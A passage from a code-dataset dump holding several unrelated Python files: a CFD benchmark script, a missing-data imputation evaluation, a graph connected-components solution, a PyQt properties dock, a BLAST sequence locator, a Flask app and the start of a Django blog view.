result_parallel.stdout\n\n # time_str_parallel = outs_parallel.split(\"\\n\")[-2].split(\" \")[-1].split(\"[\")[0]\n # time_microseconds_parallel = int(time_str_parallel)\n # time_microseconds_parallels.append(time_microseconds_parallel)\n time_microseconds_parallels.append(0)\n\n # print(f\"Res(mesh_size={mesh_size}) = cuda - {min(time_microseconds_cudas)} parallel - {min(time_microseconds_parallels)}\")\n print(f\"Res(mesh_size={mesh_size}) = cuda - {min(time_microseconds_cudas)} parallel - \")\n\n return time_microseconds_cudas, time_microseconds_parallels\n\n\ndef generate_report(mesh_sizes, output_file=\"report_cuda.csv\"):\n times_microseconds_cuda = []\n times_microseconds_parallel = []\n mesh_sizes_df = []\n for mesh_size in mesh_sizes:\n time_cur_cudas, time_cur_parallels = run_one_run(mesh_size)\n for time_cur_cuda, time_cur_parallel in zip(time_cur_cudas, time_cur_parallels):\n mesh_sizes_df.append(mesh_size)\n times_microseconds_cuda.append(time_cur_cuda)\n times_microseconds_parallel.append(time_cur_parallel)\n print(time_cur_cuda, time_cur_parallel)\n\n df_dict = {\"mesh_sizes\": mesh_sizes_df, \"times_microseconds_cuda\": times_microseconds_cuda,\n \"times_microseconds_parallel\": times_microseconds_parallel}\n df = pd.DataFrame(df_dict)\n df.to_csv(output_file)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(prog='cfdARCHO bench')\n parser.add_argument('-mf', '--mesh_size_from', required=False, type=int)\n parser.add_argument('-mt', '--mesh_size_to', required=False, type=int)\n parser.add_argument('-ms', '--mesh_size_step', required=False, type=int)\n parser.add_argument('-m', '--meshes', required=False, nargs='+', type=int)\n parser.add_argument('-o', '--out_file', required=False, default=\"report_cuda_history.csv\")\n\n args = parser.parse_args()\n\n if args.meshes is None:\n mesh_sizes = range(args.mesh_size_from, args.mesh_size_to, args.mesh_size_step)\n else:\n mesh_sizes = args.meshes\n generate_report(list(mesh_sizes), args.out_file)\n\n","repo_name":"yewhenp/cfdARCO","sub_path":"cfdARCO/scripts/test_cuda_execution.py","file_name":"test_cuda_execution.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"19487024432","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport pathlib\n\nfrom utils.utils import rmse_loss, get_bins_from_numerical\nfrom evaluation.performance_metric import marginal_estimands, bivariate_estimands, house_bins\n\n# Load data\nmodel_names = [\"cart\", \"rf\", \"gain\", \"mida\"]\nnum_samples = 100\nnum_imputations = 10\n\nsave_name = \"house\"\nmiss_mechanism = \"MCAR\"\nfile_name = '../data/house_recoded.csv'\ndata_df = pd.read_csv(file_name)\ndata_x = data_df.values.astype(np.float32)\n\nnum_index = list(range(-8, 0))\ncat_index = list(range(-data_df.shape[1], -8))\n\n# Parameters\nno, dim = data_x.shape\n\n# seperate categorical variables and numerical variables\nif cat_index:\n data_cat_pop_df = data_df.iloc[:, cat_index]\n # get all possible levels for categorical variable\n all_levels = [np.unique(x) for x in data_x[:, cat_index].T]\n all_levels_dict = dict(zip(data_df.columns[cat_index], all_levels))\n # population estimands\n mar_Q, mar_Q_var = marginal_estimands(data_cat_pop_df, all_levels_dict)\n biv_Q, biv_Q_var = bivariate_estimands(data_cat_pop_df, all_levels_dict)\n # qualified index\n mar_index = (mar_Q * no > 10) & ((1 - mar_Q) * no > 10)\n biv_index = (biv_Q * no > 10) & ((1 - biv_Q) * no > 10)\n # performance metrics\n mar_qhat = np.empty(shape=(mar_Q.shape[0], num_samples))\n mar_qhat_var = np.empty(shape=(mar_Q_var.shape[0], num_samples))\n biv_qhat = np.empty(shape=(biv_Q.shape[0], num_samples))\n biv_qhat_var = np.empty(shape=(biv_Q_var.shape[0], num_samples))\n # initial imputed metrics\n mar_prob_impute = {}\n mar_var_impute = {}\n biv_prob_impute = {}\n biv_var_impute = {}\n\n\nif num_index:\n data_num_pop_df = data_df.iloc[:, num_index]\n if save_name != \"house2\":\n data_bin_pop_ls, bins = zip(*data_num_pop_df.apply(pd.qcut, 0, q=8, labels = False, retbins=True, duplicates=\"drop\"))\n data_bin_pop_df = pd.concat(data_bin_pop_ls, axis=1)\n else:\n bins = house_bins\n data_bin_pop_df = get_bins_from_numerical(data_num_pop_df, house_bins)\n # get all possible levels\n bin_all_levels = [np.unique(x) for x in data_bin_pop_df.values.T]\n bin_all_levels_dict = dict(zip(data_df.columns[num_index], bin_all_levels))\n # population estimands\n mar_bin_Q, mar_bin_Q_var = marginal_estimands(data_bin_pop_df, bin_all_levels_dict)\n biv_bin_Q, biv_bin_Q_var = bivariate_estimands(data_bin_pop_df, bin_all_levels_dict)\n # qualified index\n mar_bin_index = (mar_bin_Q * no > 10) & ((1 - mar_bin_Q) * no > 10)\n biv_bin_index = (biv_bin_Q * no > 10) & ((1 - biv_bin_Q) * no > 10)\n # performance metrics\n mar_bin_qhat = np.empty(shape=(mar_bin_Q.shape[0], num_samples))\n mar_bin_qhat_var = np.empty(shape=(mar_bin_Q_var.shape[0], num_samples))\n biv_bin_qhat = np.empty(shape=(biv_bin_Q.shape[0], num_samples))\n biv_bin_qhat_var = np.empty(shape=(biv_bin_Q_var.shape[0], num_samples))\n # initial imputed metrics\n mar_bin_prob_impute = {}\n mar_bin_var_impute = {}\n biv_bin_prob_impute = {}\n biv_bin_var_impute = {}\n\nmse = {}\n\nfor model_name in model_names:\n if cat_index:\n mar_prob_impute[model_name] = np.empty(shape=(mar_Q.shape[0], num_samples, num_imputations))\n mar_var_impute[model_name] = np.empty(shape=(mar_Q_var.shape[0], num_samples, num_imputations))\n biv_prob_impute[model_name] = np.empty(shape=(biv_Q.shape[0], num_samples, num_imputations))\n biv_var_impute[model_name] = np.empty(shape=(biv_Q_var.shape[0], num_samples, num_imputations))\n if num_index:\n mar_bin_prob_impute[model_name] = np.empty(shape=(mar_bin_Q.shape[0], num_samples, num_imputations))\n mar_bin_var_impute[model_name] = np.empty(shape=(mar_bin_Q_var.shape[0], num_samples, num_imputations))\n biv_bin_prob_impute[model_name] = np.empty(shape=(biv_bin_Q.shape[0], num_samples, num_imputations))\n biv_bin_var_impute[model_name] = np.empty(shape=(biv_bin_Q_var.shape[0], num_samples, num_imputations))\n\n # acc[model_name] = []\n mse[model_name] = []\n\nfor i in range(num_samples):\n # load samples\n data_i = np.loadtxt('../samples/{}/complete/sample_{}.csv'.format(save_name, i),\n delimiter=\",\").astype(np.float32)\n data_miss_i = np.loadtxt('../samples/{}/{}/sample_{}.csv'.format(save_name, miss_mechanism, i),\n delimiter=\",\").astype(np.float32)\n data_m = 1 - np.isnan(data_miss_i).astype(np.float32)\n # seperate categorical variables and numerical variables\n if cat_index:\n data_cat = data_i[:, cat_index]\n data_m_cat = data_m[:, cat_index]\n data_cat_df = pd.DataFrame(data=data_cat,\n index=list(range(data_cat.shape[0])),\n columns=data_df.columns[cat_index])\n # marginal prob and bivariate prob before introduce missingness\n mar_qhat[:, i], mar_qhat_var[:, i] = marginal_estimands(data_cat_df, all_levels_dict)\n biv_qhat[:, i], biv_qhat_var[:, i] = bivariate_estimands(data_cat_df, all_levels_dict)\n if num_index:\n data_num = data_i[:, num_index]\n data_m_num = data_m[:, num_index]\n data_num_df = pd.DataFrame(data=data_num,\n index=list(range(data_num.shape[0])),\n columns=data_df.columns[num_index])\n data_bin_df = get_bins_from_numerical(data_num_df, bins)\n # marginal prob and bivariate prob before introduce missingness\n mar_bin_qhat[:, i], mar_bin_qhat_var[:, i] = marginal_estimands(data_bin_df, bin_all_levels_dict)\n biv_bin_qhat[:, i], biv_bin_qhat_var[:, i] = bivariate_estimands(data_bin_df, bin_all_levels_dict)\n\n for model_name in model_names:\n print(\"{}th sample, model: {}\".format(i, model_name))\n for l in range(num_imputations):\n # loading imputations\n if model_name == \"gain\" or model_name == \"mida\":\n data_imputed = np.loadtxt('../results/{}/{}/{}/imputed_{}_{}.csv'.format(save_name, miss_mechanism, model_name, i, l),delimiter=\",\").astype (np.float32)\n if model_name == \"cart\" or model_name ==\"rf\":\n data_imputed = pd.read_csv('../results/{}/{}/{}/imputed_{}_{}.csv'.format(save_name, miss_mechanism, model_name, i, l)).values.astype(np.float32)\n # report accuracy\n mse[model_name].append(rmse_loss(data_i, data_imputed, data_m))\n # seperate categorical variables an d numerical variables\n if cat_index:\n imputed_cat = data_imputed[:, cat_index]\n imputed_cat_df = pd.DataFrame(data=imputed_cat,\n index=list(range(imputed_cat.shape[0])),\n columns=data_df.columns[cat_index])\n # get imputed marginal prob and biviate prob for ith sample\n mar_prob_impute[model_name][:, i, l], mar_var_impute[model_name][:, i, l] = marginal_estimands(\n imputed_cat_df, all_levels_dict)\n biv_prob_impute[model_name][:, i, l], biv_var_impute[model_name][:, i, l] = bivariate_estimands(\n imputed_cat_df, all_levels_dict)\n if num_index:\n imputed_num = data_imputed[:, num_index]\n imputed_num_df = pd.DataFrame(data=imputed_num,\n index=list(range(imputed_num.shape[0])),\n columns=data_df.columns[num_index])\n imputed_bin_df = get_bins_from_numerical(imputed_num_df, bins)\n # get imputed marginal prob and biviate prob for ith sample\n mar_bin_prob_impute[model_name][:, i, l], mar_bin_var_impute[model_name][:, i, l] = marginal_estimands(imputed_bin_df, bin_all_levels_dict)\n biv_bin_prob_impute[model_name][:, i, l], biv_bin_var_impute[model_name][:, i, l] = bivariate_estimands(imputed_bin_df, bin_all_levels_dict)\n pass\n pass\n pass\n\n# save estimands\nsave_path = \"../metrics/{}/{}\".format(save_name, miss_mechanism)\npathlib.Path(save_path).mkdir(parents=True, exist_ok=True)\nif cat_index:\n # population estimands\n np.save(os.path.join(save_path, \"mar_Q\"), mar_Q)\n np.save(os.path.join(save_path, \"mar_Q_var\"), mar_Q_var)\n np.save(os.path.join(save_path, \"biv_Q\"), biv_Q)\n np.save(os.path.join(save_path, \"biv_Q_var\"), biv_Q_var)\n # premiss estimands\n np.save(os.path.join(save_path, \"mar_qhat\"), mar_qhat)\n np.save(os.path.join(save_path, \"mar_qhat_var\"), mar_qhat_var)\n np.save(os.path.join(save_path, \"biv_qhat\"), biv_qhat)\n np.save(os.path.join(save_path, \"biv_qhat_var\"), biv_qhat_var)\n # imputed estimands\n np.save(os.path.join(save_path, \"mar_prob_impute\"), mar_prob_impute)\n np.save(os.path.join(save_path, \"mar_var_impute\"), mar_var_impute)\n np.save(os.path.join(save_path, \"biv_prob_impute\"), biv_prob_impute)\n np.save(os.path.join(save_path, \"biv_var_impute\"), biv_var_impute)\nif num_index:\n # population estimands\n np.save(os.path.join(save_path, \"mar_bin_Q\"), mar_bin_Q)\n np.save(os.path.join(save_path, \"mar_bin_Q_var\"), mar_bin_Q_var)\n np.save(os.path.join(save_path, \"biv_bin_Q\"), biv_bin_Q)\n np.save(os.path.join(save_path, \"biv_bin_Q_var\"), biv_bin_Q_var)\n # performance metrics\n np.save(os.path.join(save_path, \"mar_bin_qhat\"), mar_bin_qhat)\n np.save(os.path.join(save_path, \"mar_bin_qhat_var\"), mar_bin_qhat_var)\n np.save(os.path.join(save_path, \"biv_bin_qhat\"), biv_bin_qhat)\n np.save(os.path.join(save_path, \"biv_bin_qhat_var\"), biv_bin_qhat_var)\n # initial imputed metrics\n np.save(os.path.join(save_path, \"mar_bin_prob_impute\"), mar_bin_prob_impute)\n np.save(os.path.join(save_path, \"mar_bin_var_impute\"), mar_bin_var_impute)\n np.save(os.path.join(save_path, \"biv_bin_prob_impute\"), biv_bin_prob_impute)\n np.save(os.path.join(save_path, \"biv_bin_var_impute\"), biv_bin_var_impute)\n\nnp.save(os.path.join(save_path, \"mse\"), mse)","repo_name":"zhenhua-wang/MissingData_DL","sub_path":"evaluation/calculate_estimands.py","file_name":"calculate_estimands.py","file_ext":"py","file_size_in_byte":10153,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"}
+{"seq_id":"33043266078","text":"import sys\r\nsys.setrecursionlimit(10000)\r\ninput = sys.stdin.readline\r\n\r\nn, m = map(int, input().split())\r\n\r\nroot = [[] for _ in range(n+1)]\r\nvisited = [False for _ in range(n+1)]\r\ncount = 0\r\n\r\n\r\nfor _ in range(m):\r\n u, v = map(int, input().split())\r\n \r\n root[u].append(v)\r\n root[v].append(u)\r\n \r\n\r\n\r\ndef DFS(now):\r\n visited[now] = True\r\n for i in root[now]:\r\n if not visited[i]:\r\n DFS(i)\r\n \r\nfor i in range(1, n+1):\r\n if not visited[i]:\r\n count += 1\r\n DFS(i)\r\n \r\nprint(count)\r\n \r\n\r\n","repo_name":"MiniMini-On/Algorithm","sub_path":"백준/Silver/11724. 연결 요소의 개수/연결 요소의 개수.py","file_name":"연결 요소의 개수.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37866282748","text":"from utils import Utils\nfrom object import Object\nfrom pyqtcore import QString\nfrom propertybrowser import PropertyBrowser\nfrom documentmanager import DocumentManager\nfrom changeproperties import SetProperty, RemoveProperty, RenameProperty\nfrom PyQt5.QtCore import (\n Qt,\n QSize,\n QEvent\n)\nfrom PyQt5.QtGui import (\n QIcon,\n QKeySequence\n)\nfrom PyQt5.QtWidgets import (\n QWidget,\n QVBoxLayout,\n QToolBar,\n QLineEdit, \n QInputDialog,\n QAction,\n QDockWidget\n)\ndef isExternal(object):\n if (not object):\n return False\n x = object.typeId()\n if x==Object.TilesetType:\n return object.isExternal()\n elif x==Object.TileType:\n return object.tileset().isExternal()\n elif x==Object.TerrainType:\n return object.tileset().isExternal()\n else:\n return False\n\nclass PropertiesDock(QDockWidget):\n\n def __init__(self, parent = None):\n super().__init__(parent)\n self.mMapDocument = None\n self.mPropertyBrowser = PropertyBrowser()\n\n self.setObjectName(\"propertiesDock\")\n self.mActionAddProperty = QAction(self)\n self.mActionAddProperty.setEnabled(False)\n self.mActionAddProperty.setIcon(QIcon(\":/images/16x16/add.png\"))\n self.mActionAddProperty.triggered.connect(self.addProperty)\n self.mActionRemoveProperty = QAction(self)\n self.mActionRemoveProperty.setEnabled(False)\n self.mActionRemoveProperty.setIcon(QIcon(\":/images/16x16/remove.png\"))\n self.mActionRemoveProperty.triggered.connect(self.removeProperty)\n self.mActionRenameProperty = QAction(self)\n self.mActionRenameProperty.setEnabled(False)\n self.mActionRenameProperty.setIcon(QIcon(\":/images/16x16/rename.png\"))\n self.mActionRenameProperty.triggered.connect(self.renameProperty)\n Utils.setThemeIcon(self.mActionAddProperty, \"add\")\n Utils.setThemeIcon(self.mActionRemoveProperty, \"remove\")\n Utils.setThemeIcon(self.mActionRenameProperty, \"rename\")\n toolBar = QToolBar()\n toolBar.setFloatable(False)\n toolBar.setMovable(False)\n toolBar.setIconSize(QSize(16, 16))\n toolBar.addAction(self.mActionAddProperty)\n toolBar.addAction(self.mActionRemoveProperty)\n toolBar.addAction(self.mActionRenameProperty)\n widget = QWidget(self)\n layout = QVBoxLayout(widget)\n layout.setContentsMargins(5, 5, 5, 5)\n layout.setSpacing(0)\n layout.addWidget(self.mPropertyBrowser)\n layout.addWidget(toolBar)\n widget.setLayout(layout)\n self.setWidget(widget)\n manager = DocumentManager.instance()\n manager.currentDocumentChanged.connect(self.mapDocumentChanged)\n self.mPropertyBrowser.currentItemChangedSignal.connect(self.currentItemChanged)\n self.retranslateUi()\n\n def bringToFront(self):\n self.show()\n self.raise_()\n self.mPropertyBrowser.setFocus()\n\n def event(self, event):\n x = event.type()\n if x==QEvent.KeyPress or x==QEvent.ShortcutOverride:\n keyEvent = event\n if (keyEvent.matches(QKeySequence.Delete) or keyEvent.key() == Qt.Key_Backspace):\n if event.type() == QEvent.KeyPress:\n self.removeProperty()\n event.accept()\n return True\n elif x==QEvent.LanguageChange:\n self.retranslateUi()\n else:\n pass\n\n return super().event(event)\n\n def mapDocumentChanged(self, mapDocument):\n if type(mapDocument)==list:\n mapDocument = mapDocument[0]\n if (self.mMapDocument):\n self.mMapDocument.disconnect()\n self.mMapDocument = mapDocument\n self.mPropertyBrowser.setMapDocument(mapDocument)\n if (mapDocument):\n mapDocument.currentObjectChanged.connect(self.currentObjectChanged)\n mapDocument.tilesetFileNameChanged.connect(self.tilesetFileNameChanged)\n mapDocument.editCurrentObject.connect(self.bringToFront)\n self.currentObjectChanged(mapDocument.currentObject())\n else:\n self.currentObjectChanged(None)\n\n def currentObjectChanged(self, object):\n if type(object)==list and len(object)>0:\n object = object[0]\n self.mPropertyBrowser.setObject(object)\n enabled = object != None and not isExternal(object)\n self.mPropertyBrowser.setEnabled(enabled)\n self.mActionAddProperty.setEnabled(enabled)\n\n def currentItemChanged(self, item):\n isCustomProperty = self.mPropertyBrowser.isCustomPropertyItem(item)\n external = isExternal(self.mPropertyBrowser.object())\n self.mActionRemoveProperty.setEnabled(isCustomProperty and not external)\n self.mActionRenameProperty.setEnabled(isCustomProperty and not external)\n\n def tilesetFileNameChanged(self, tileset):\n object = self.mMapDocument.currentObject()\n if (not object):\n return\n update = False\n x = object.typeId()\n if x==Object.TilesetType:\n update = object == tileset\n elif x==Object.TileType:\n update = object.tileset() == tileset\n elif x==Object.TerrainType:\n update = object.tileset() == tileset\n else:\n pass\n\n if (update):\n self.currentObjectChanged(object)\n self.currentItemChanged(self.mPropertyBrowser.currentItem())\n\n def addProperty(self, *args):\n l = len(args)\n if l==0:\n property, ok = QInputDialog.getText(self.mPropertyBrowser, self.tr(\"Add Property\"),\n self.tr(\"Name:\"), QLineEdit.Normal,'')\n if ok:\n self.addProperty(property)\n elif l==1:\n arg1 = args[0]\n tp = type(arg1)\n if tp==bool:\n self.addProperty()\n elif tp in [str, QString]:\n name = arg1\n if name=='':\n return\n object = self.mMapDocument.currentObject()\n if (not object):\n return\n if (not object.hasProperty(name)):\n undoStack = self.mMapDocument.undoStack()\n undoStack.push(SetProperty(self.mMapDocument, self.mMapDocument.currentObjects(), name, QString()))\n\n self.mPropertyBrowser.editCustomProperty(name)\n\n def removeProperty(self):\n item = self.mPropertyBrowser.currentItem()\n object = self.mMapDocument.currentObject()\n if (not item or not object):\n return\n name = item.property().propertyName()\n undoStack = self.mMapDocument.undoStack()\n items = item.parent().children()\n if items.count() > 1:\n currentItemIndex = items.indexOf(item)\n if item == items.last():\n self.mPropertyBrowser.setCurrentItem(items.at(currentItemIndex - 1))\n else:\n self.mPropertyBrowser.setCurrentItem(items.at(currentItemIndex + 1))\n\n undoStack.push(RemoveProperty(self.mMapDocument, self.mMapDocument.currentObjects(), name))\n\n def renameProperty(self, *args):\n l = len(args)\n if l==0:\n item = self.mPropertyBrowser.currentItem()\n if (not item):\n return\n oldName = item.property().propertyName()\n dialog = QInputDialog(self.mPropertyBrowser)\n dialog.setInputMode(QInputDialog.TextInput)\n dialog.setLabelText(self.tr(\"Name:\"))\n dialog.setTextValue(oldName)\n dialog.setWindowTitle(self.tr(\"Rename Property\"))\n dialog.open(self.renameProperty)\n elif l==1:\n name = args[0]\n if (name.isEmpty()):\n return\n item = self.mPropertyBrowser.currentItem()\n if (not item):\n return\n oldName = item.property().propertyName()\n if (oldName == name):\n return\n undoStack = self.mMapDocument.undoStack()\n undoStack.push(RenameProperty(self.mMapDocument, self.mMapDocument.currentObjects(), oldName, name))\n\n def retranslateUi(self):\n self.setWindowTitle(self.tr(\"Properties\"))\n self.mActionAddProperty.setText(self.tr(\"Add Property\"))\n self.mActionRemoveProperty.setText(self.tr(\"Remove Property\"))\n self.mActionRenameProperty.setText(self.tr(\"Rename Property\"))\n","repo_name":"theall/Python-Tiled","sub_path":"src/tiled/propertiesdock.py","file_name":"propertiesdock.py","file_ext":"py","file_size_in_byte":8453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"5670186536","text":"\nimport config\n\nfrom pprint import pprint\n\nimport blast\nimport ranges\n\n\ndef locate_sequence(seq, genome, check_uniq=True, evalue_threshold=1e-40,\n hsp_align_len_threshold=None, hsp_identity_threshold=None):\n\n blast_dir = config.CACHE_DIR / 'blast'\n blast_dir.mkdir(exist_ok=True)\n\n res = blast.prepare_blast_db(genome, blast_dir, db_type='nucl',\n skip_if_exists=True)\n db_path = res['db_path']\n\n res = blast.blast_seqs([{'seq': seq, 'name': 'seq'}],\n db_path, blast_program='blastn',\n evalue_threshold=evalue_threshold)\n\n subjects = list(res['seq'].keys())\n if check_uniq:\n if len(subjects) > 1:\n raise RuntimeError('Sequence found in several subjects')\n\n locations = []\n for subject, hsps in res['seq'].items():\n hsps = blast.filter_hsps_by_align_len(hsps, hsp_align_len_threshold)\n hsps = blast.filter_hsps_by_identity(hsps, hsp_identity_threshold)\n\n subject_ranges = []\n for hsp in hsps:\n subject_ranges.append({'chrom': subject,\n 'start': hsp['subject_start'],\n 'end': hsp['subject_end'],\n 'strand': '+' if hsp['subject_strand'] == 1 else '-'})\n subject_ranges = ranges.merge_ranges(subject_ranges)\n for range_ in subject_ranges:\n locations.append({'subject': subject,\n 'start': range_['start'],\n 'end': range_['end'],\n 'strand': range_['strand']\n })\n\n if check_uniq:\n if len(locations) > 1:\n raise RuntimeError('Sequence found in several subjects')\n\n return locations\n\n\nif __name__ == '__main__':\n seq = 'AGACAAGTGGTGAAGAAKAAGATGATATGCAGCAATGCATTTCACCACTTTATATAGCATGGAGTGGATTTCTCCACCTCATTTAATAGTATGAAGTGGAGGCAGCCCCCCTCTACACCTGTCCACTAAGGCCAGCCCACAATCTGATCCCTTTTAATTTTTGCCTTGAGTGGTGGGGCCCATTGGATTAAATCAATCCAAATTAGCCAC'\n locations = locate_sequence(seq, config.TOMATO_GENOME_FASTA, check_uniq=False,\n hsp_align_len_threshold=70, hsp_identity_threshold=95)\n pprint(locations)","repo_name":"bioinfcomav/tomato_haplotype_paper_old","sub_path":"src/locate_seq_using_blast.py","file_name":"locate_seq_using_blast.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"226250619","text":"# coding: utf-8\nfrom flask import Flask\nfrom flask import render_template\n\nimport gspread\nfrom oauth2client.client import SignedJwtAssertionCredentials\nimport json\n\nimport urllib\nimport urllib2\nfrom BeautifulSoup import BeautifulSoup\nimport random\nfrom flask import request\nfrom flask.ext.cache import Cache\n\nfrom save_historians import *\nimport time\nimport random\n\napp = Flask(__name__)\napp.config['CACHE_TYPE'] = 'simple'\napp.cache = Cache(app, config={\n 'CACHE_TYPE': 'filesystem',\n 'CACHE_DIR': 'cache-dir',\n 'CACHE_DEFAULT_TIMEOUT': 922337203685477580,\n 'CACHE_THRESHOLD': 922337203685477580\n })\n\n@app.route(\"/\")\ndef main():\n\treturn 'nginx is running'\n\n@app.route(\"/historyofgreats\")\ndef historyofgreats():\n\tcached = app.cache.get('main')\n\tif cached:\n\t\treturn cached\n\tworksheet = setWorkSheet()\n\tdata = worksheet.get_all_values()\n\tresult = render_template('graphs.html',data=data)\n\tapp.cache.set('main', result)\n\treturn result\n\n@app.route(\"/claim\", methods=[\"POST\"])\ndef claim():\n\tclaimtype = request.form.get('claimtype')\n\tmsg = request.form.get('msg')\n\tresult = saveClaim(claimtype,msg)\n\treturn json.dumps(result)\n\n@app.route(\"/add\", methods=[\"POST\"])\ndef add():\n\tname = request.form.get('name')\n\tresult = addHistory(name)\n\tif result['resultCode'] == '1':\n\t\tapp.cache.delete('main')\n\treturn json.dumps(result)\n\n#Flush Cache\n@app.route(\"/cache_flush/\")\ndef cache_flush(key_name):\n\tapp.cache.delete(key_name)\n\treturn 'Done: [ ' + key_name + ' ] is Deleted'\n\n#test\n@app.route(\"/test/\")\ndef test(name):\n\tresult = getinfoWiki(name)\n\treturn json.dumps(result)\n\nif __name__ == \"__main__\":\n \tapp.run('0.0.0.0',8080,debug=True)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"bumkyulee/historyofgreats","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"36174493238","text":"from django.http import HttpResponse, Http404\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom datetime import datetime\nfrom blog.models import Article\nfrom .forms import ContactForm, ArticleForm\n\n\ndef accueil(request):\n \"\"\" Afficher tous les articles de notre blog \"\"\"\n articles = Article.objects.all() # Nous sélectionnons tous nos articles\n return render(request, 'blog/accueil.html', {'derniers_articles': articles})\n\n\ndef lire(request, id, slug):\n article = get_object_or_404(Article, id=id, slug=slug)\n return render(request, 'blog/lire.html', {'article': article})\n\n\ndef home(request):\n \"\"\" Exemple de page non valide au niveau HTML pour que l'exemple soit concis \"\"\"\n # return HttpResponse(\"\"\"\n #
Bienvenue sur mon blog !
\n #
Les crêpes bretonnes ça tue des mouettes en plein vol !